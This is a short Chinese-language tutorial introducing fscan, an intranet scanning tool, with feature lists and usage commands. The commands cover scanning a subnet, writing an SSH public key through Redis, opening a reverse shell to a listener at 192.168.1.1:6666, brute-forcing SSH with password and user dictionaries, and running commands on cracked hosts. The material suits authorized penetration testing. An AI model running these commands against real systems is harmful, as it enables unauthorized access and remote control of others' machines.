工欲善其事必先利其器。一款优秀的工具能帮助我们很快的完成目标。这不神器
Fscan
給大家呈上。
关于
fscan
是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010
、redis
批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios
探测、域控识别等功能。
特色功能
-
端口扫描、主机存活探测。
-
支持各类服务的暴力破解。
-
netbios、域、高危漏洞扫描。
-
web指纹识别
安装
我们在其项目地址根据系统类型,下载对应的包即可。https://github.com/shadow1ng/fscan/releases
运行时,注意添加对应的权限。
使用
./fscan -h
🎬默认扫描
默认加载全部模块,扫描时间比较长。扫描结果会自动保存在result.txt
文件中。
./fscan -h 192.168.123.1/24
如下,在默认扫描过程中。目标主机发现了弱口令。
⛴redis 写公钥
如果内网服务器安装了redis
可以尝试对其写入公钥。从而获取系统权限。
fscan -h 192.168.123.173 -rf id_rsa.pub #redis反弹shell fscan 192.168.123.173 -rs 192.168.1.1:6666
🐼ssh爆破
在爆破完成ssh后,我们还可以通过-c
参数,后面直接跟命令。
./fscan -h 192.168.123.1 -c whoami
在爆破过程中,常用参数有:
-
-``pwdf
指定密码字典 -
-userf
指定用户字典 -
-p
指定端口
🍭常用模块
在指定模块时,我们用-m
命令。后面对应的模块有ssh
ms17010
smb2
wmiexec
等,默认加载全部模块。